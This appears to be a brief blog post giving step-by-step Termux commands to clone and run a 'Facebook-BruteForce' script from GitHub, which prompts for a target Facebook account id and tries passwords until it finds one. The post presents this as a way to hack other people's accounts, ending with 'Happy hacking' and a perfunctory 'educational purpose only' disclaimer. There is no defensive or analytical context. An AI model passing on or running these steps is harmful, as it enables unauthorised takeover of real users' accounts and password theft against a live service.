Thursday, January 30, 2020

HOW TO HACK FACEBOOK USING BRUTEFORCE ATTACK IN TERMUX

Firstly, download termux apk from Google play store. After installing it, run the apk and type the following commands accordingly:
$ pkg update 
$ pkg upgrade 
$ apt install git
$ git clone https://github.com/IAmBlackHacker/Facebook-BruteForce
$ cd Facebook-BruteForce 
$ pip3 install requests bs4
$ python3 fb.py
After following all these steps, it will then ask for the Facebook id u wish to hack. After inputting it, it will start the bruteforce attack immediately, if it found the password, it will inform you.
Have fun
Happy hacking
Pls do not spam, it's for educational purpose only

No comments:

Post a Comment